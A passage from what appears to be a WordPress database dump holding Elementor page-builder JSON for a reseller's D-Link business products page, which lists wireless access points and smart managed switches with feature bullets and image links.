]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G Uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"db53704\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DES-1510-52-510x600.jpg\",\"id\":2647}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"37182c4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T + 2 SFP Ports + 2 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Built-in SNMP MIB for remote Network Management Systems<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"38f0a9a\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"4be48a8\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit PoE Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3f346e9\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28XMP_A1_Image-LFront-510X600-510x600.jpg\",\"id\":2648}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"052fb2e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Support IEEE 802.3af (PoE) and 802.3at (PoE+) \\u00a0with Power Budget of 370W<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"17edb25\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"98c3571\",\"elType\":\"widget\",\"settings\":{\"title\":\"28-Port Layer 3 Lite Smart Managed Gigabit Switch with 4 10G uplink\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"a2dc1a5\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1510-28X-510x600.jpg\",\"id\":2649}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"82006f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Ports 10\\/100\\/1000 Base-T PoE + 4 x 10G SFP+ Slots<\\/p><p>Physical Stacking via two 10 Gigabit SFP+ Ports with stacking up to six device<\\/p><p>Virtual stacking of up to 32 units via D-link\\u2019s Single IP Management (SIM)<\\/p><p>Support G.8032 ERPS to achieve high reliability \\u00a0and network stability<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>IEEE 802.3az Energy Efficient Ethernet with \\u00a0D-Link Green 3.0 power-saving features<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support Layer 2 Features \\u2013 IGMP &amp; MLD Snooping, 802.3x \\u00a0Flow control \\u00a0and LLDP<\\/p><p>[maxbutton id=\\\"6\\\" ]\\u00a0<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false}]'),(7691,3427,'_elementor_version','2.5.14'),(7692,3427,'_elementor_edit_mode','builder'),(7695,3428,'_wp_page_template','template-fullwidth.php'),(7696,3428,'_elementor_template_type','post'),(7697,3428,'_elementor_data','[{\"id\":\"1f43283\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"26b7848\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"3963540\",\"elType\":\"widget\",\"settings\":{\"title\":\"D - Link Business Solution Product \",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"01972e4\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"d52d974\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"cee2f63\",\"elType\":\"widget\",\"settings\":{\"title\":\"\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f179b24\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"6dd0023\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"2445e57\",\"elType\":\"widget\",\"settings\":{\"title\":\"Business Wireless\",\"header_size\":\"h3\",\"title_color\":\"#000000\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"_padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"87263a7\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"670851a\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"8492236\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wave 2 Dual\\u2011Band WI-FI PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"46550cc\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2680-features3.png\",\"id\":2359},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"d3dd31e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\u00a0802.11ac Wave 2 wireless, up to 1.75 Gbps<\\/p><p>MU-MIMO with beamforming<\\/p><p>Band steering<\\/p><p>Gigabit PoE-capable LAN port<\\/p><p>AP Array utility support<\\/p><p>Free D-Link Central WiFiManager<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ed243d3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"284\",\"right\":\"284\",\"bottom\":\"284\",\"left\":\"284\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e4eb9a0\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2bd1d30\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":23},\"elements\":[{\"id\":\"5df83e1\",\"elType\":\"widget\",\"settings\":{\"title\":\"2.4GHz Wireless N300 Outdoor Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"9d80101\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-3310-front-510x600.jpg\",\"id\":2360},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"47bee85\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Wireless N300 Mbps 2.4GHz Single Band Outdoor Access Point with POE Pass-Through<\\/p><p>Two 10\\/100 Ethernet ports (one supporting PoE) allow for further physical expansion<\\/p><p>Built-in 10 dBi sector antenna with high power output ensuring that wireless coverage<\\/p><p>Weather-proof design (IPX6) built to withstand harsh environments<\\/p><p>Supports multiple operation modes \\u2013 AP,WDS with AP, Client, Repeater, WISP Client &amp; Repeater<\\/p><p>Supports 802.1Q VLAN Tagging, operating with multiple SSIDs to segment traffic<\\/p><p>Provides WLAN partitioning for deployments such as wireless hot spots<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"db46566\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"69\",\"right\":\"69\",\"bottom\":\"69\",\"left\":\"69\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"864ef7a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"921801b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":15},\"elements\":[{\"id\":\"3587cd7\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1750 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"8c43c0a\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600.png\",\"id\":2361},\"image_size\":\"medium\",\"image_custom_dimension\":{\"width\":\"1000\",\"height\":\"1000\"}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"176122c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Up to 1750 MBPS high-speed wireless performance on 802.11ac standards<\\/p><p>Support Wireless Speed of 450 MB over 2.4 GHz &amp; 1300 Mbps\\u00a0 Over 5 GHz band<\\/p><p>Support load balancing to ensure maximum performance by limiting user\\u00a0 per AP<\\/p><p>Support Wi-Fi Multimedia QoS for audio, video, and voice applications<\\/p><p>Six detachable antennas for optimal wireless coverage over 2.4 GHz\\u00a0 or 5 GHz band<\\/p><p>Two Gigabit LAN ports , One Port Support 802.at Power over Ethernet<\\/p><p>Support multiple operation \\u2013 AP, WDS with AP, WDS\\/Bridge and Client<\\/p><p>Rugged\\u00a0 metal housing &amp;\\u00a0 Plenum-rated chassis<\\/p><p>Built in Radius Server\\u00a0 allowing users to create their accounts within the device itself.<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"b8d278c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8c3cde4\",\"elType\":\"section\",\"settings\":{\"structure\":\"30\"},\"elements\":[{\"id\":\"6c2ecda\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"2ae7a13\",\"elType\":\"widget\",\"settings\":{\"title\":\"N600 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"f2d465f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage-510x600.png\",\"id\":2362},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9584be6\",\"elType\":\"widget\",\"settings\":{\"editor\":\"802.11ac Wave 2 wireless, up to 1.75 Gbps\\n\\nMU-MIMO with beamforming\\n\\nBand steering\\n\\nGigabit PoE-capable LAN port\\n\\nAP Array utility support\\n\\nFree D-Link Central WiFiManager\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"6ad865a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"\",\"_margin\":{\"unit\":\"px\",\"top\":\"254\",\"right\":\"254\",\"bottom\":\"254\",\"left\":\"254\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a79c898\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6a7db1b\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null},\"elements\":[{\"id\":\"abb1d39\",\"elType\":\"widget\",\"settings\":{\"title\":\"AC1300 Wireless Dual-Band PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"6918a41\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DAP-2610-featured-510x600.jpg\",\"id\":2363},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5a1076c\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<h4 style=\\\"text-align: center;\\\">Enjoy High-performance Wireless Connectivity<\\/h4><p style=\\\"text-align: left;\\\">Harness the power of IEEE 802.11ac Wave 2 wireless and experience wireless speeds of up to 1300 Mbps, perfect for high-demand business applications<\\/p><h4 style=\\\"text-align: center;\\\">MU-MIMO with Beamforming<\\/h4><p>Dramatically improves the wireless range and performance as well as allowing multiple devices to connect simultaneously to the wireless network<\\/p><h4 style=\\\"text-align: center;\\\">Multiple Operational Modes<\\/h4><p>Flexible options allows the DAP-2610 to function as an access point, a Wireless Distribution System (WDS), a WDS with access point, or a wireless client<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"704cbac\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"7\",\"right\":\"7\",\"bottom\":\"7\",\"left\":\"7\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"c4fc3d8\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"space_between_widgets\":28},\"elements\":[{\"id\":\"6b87f5d\",\"elType\":\"widget\",\"settings\":{\"title\":\"N300 Wireless PoE Access Point\\u200b\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"40\",\"right\":\"40\",\"bottom\":\"40\",\"left\":\"40\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"3531775\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/dap-2330-front-510x600.jpg\",\"id\":2364},\"image_size\":\"medium\"},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"9952c2a\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>High-speed wireless performance with 300 Mbps wireless signal rates<\\/p><p>Support Wi-fi Multimedia\\u2122 (WMM) for audio, video, and voice applications<\\/p><p>Gigabit Ethernet port with 802.3af Power over EthernetMultiple operation modes: AP, WDS with AP, WDS\\/Bridgeanf Client<\\/p><p>Support Inbuilt Radius server, Network Access protection (NAP)<\\/p><p>Equipped with 8 VLANs per band for multiple SSIDs\\u00a0 Implementation<\\/p><p>Support Central WiFi Manager to configure and manage multiple AP<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e416cd6\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"047b1be\",\"elType\":\"column\",\"settings\":{\"_column_size\":100},\"elements\":[{\"id\":\"a9771aa\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"394708f\",\"elType\":\"widget\",\"settings\":{\"title\":\"Smart Switch\",\"header_size\":\"h3\",\"title_color\":\"#000000\"},\"elements\":[],\"widgetType\":\"heading\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"f63ab97\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"8bfc0eb\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"65e965e\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"617e48f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12TC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2642},\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5cada50\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G Base-T + Two 10 Gigabit SFP+ Slots +2 10GBase-T\\/SFP+ Combo Slots<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p><center>[maxbutton id=\\\"6\\\" ]<\\/center>\"},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"1528409\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"ce451cb\",\"elType\":\"widget\",\"settings\":{\"title\":\"12-Port Layer 2 Smart Managed 10Gigabit Ethernet Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"b182397\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DXS-1210-12SC_A1_Image-LFront-510x600-510x600.jpg\",\"id\":2643}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"90f4e95\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>8 Ports 10G SFP+, Two 10 Gigabit Base-T \\/SFP+ Combo Ports<\\/p><p>Suitable for virtualization, cloud services and server-to-server applications<\\/p><p>D-link Green Technology conserves energy by powering down unused ports<\\/p><p>Auto Surveillance (ASV), Auto Voice VLAN for VoIP and Video Surveillance deployments.<\\/p><p>Support G.8032 ERPS to achieve high reliability and network stability<\\/p><p>802.1X port based authentication, for authentication through external RADIUS servers<\\/p><p>Support D-Link Network Assistant Utility to simplifies the configuration<\\/p><p>Loopback Detection automatically disables port or VLAN when a loop is detected<\\/p><p>Support IGMP &amp; MLD Snooping and 802.3x Flow Control<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"4e739a4\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"6\",\"right\":\"6\",\"bottom\":\"6\",\"left\":\"6\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"2887756\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"7526ebb\",\"elType\":\"widget\",\"settings\":{\"title\":\"26-Port Layer 2 Lite Smart Managed Gigabit Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"bf0db0d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1100-26-front-510x600-510x600.jpg\",\"id\":2654}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b0830af\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>24 Port 10\\/100\\/1000 Base-T with 2 Gigabit SFP Ports<\\/p><p>Equipped with 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"e75b16a\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":93,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"0a878f7\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"6377d4b\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"68b593a\",\"elType\":\"widget\",\"settings\":{\"title\":\"10 Gigabit Ethernet Smart Managed Switches\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\"},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"659046d\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/ProductMainImage1-510x600-1.png\",\"id\":2645}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"b9868b3\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>10 Gigabit Ethernet Connection<\\/p><p>Improved Power Efficiency<\\/p><p>Smart and Flexible Management<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"9ec8985\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":494,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"7a7732d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9040bdd\",\"elType\":\"section\",\"settings\":{\"structure\":\"40\"},\"elements\":[{\"id\":\"3a1bef1\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"space_between_widgets\":21},\"elements\":[{\"id\":\"46339e5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 2 Smart Managed Gigabit PoE Switch\",\"header_size\":\"h4\",\"title_color\":\"#000000\",\"align\":\"center\",\"_margin\":{\"unit\":\"px\",\"top\":\"20\",\"right\":\"20\",\"bottom\":\"20\",\"left\":\"20\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"heading\"},{\"id\":\"5f3d924\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/bintara.com.my\\/wp-content\\/uploads\\/2018\\/12\\/DGS-1210-52MPP_E1_Image-LFront-510x600-510x600.jpg\",\"id\":2646}},\"elements\":[],\"widgetType\":\"image\"},{\"id\":\"5759169\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>48 Ports 10\\/100\\/1000 Base-T PoE + 4 slots for Gigabit SFP<\\/p><p>Support IEEE 802.3af , 802.3at POE with Power Budget up to 740 W<\\/p><p>Equipped with IEEE 802.3az Energy Efficient Ethernet (EEE) Complaint<\\/p><p>Support IEEE 802.1Q VLAN traffic segregation<\\/p><p>Access Control List (ACL) feature to enhances network security<\\/p><p>Auto Surveillance VLAN for easy integration with IP-based surveillance systems<\\/p><p>Loopback detection (LBD) and broadcast storm control to avoid network downtime<\\/p><p>Quality of Service (QOS) and bandwidth control to ensure smooth operation<\\/p><p>Support Web-based GUI, Smart Console , Network Assistance Utility<\\/p><p>Cable diagnostics function to help troubleshooting wiring problem<\\/p>\"},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"a7b2c74\",\"elType\":\"widget\",\"settings\":{\"space\":{\"unit\":\"px\",\"size\":26,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"spacer\"},{\"id\":\"2d0384d\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<center>[maxbutton id=\\\"6\\\" ]<\\/center>\",\"_margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"text-editor\"}],\"isInner\":false},{\"id\":\"30bbd67\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null},\"elements\":[{\"id\":\"cdf28d5\",\"elType\":\"widget\",\"settings\":{\"title\":\"52-Port Layer 3 Lite Smart Managed Gigabit Switch with 2 10G 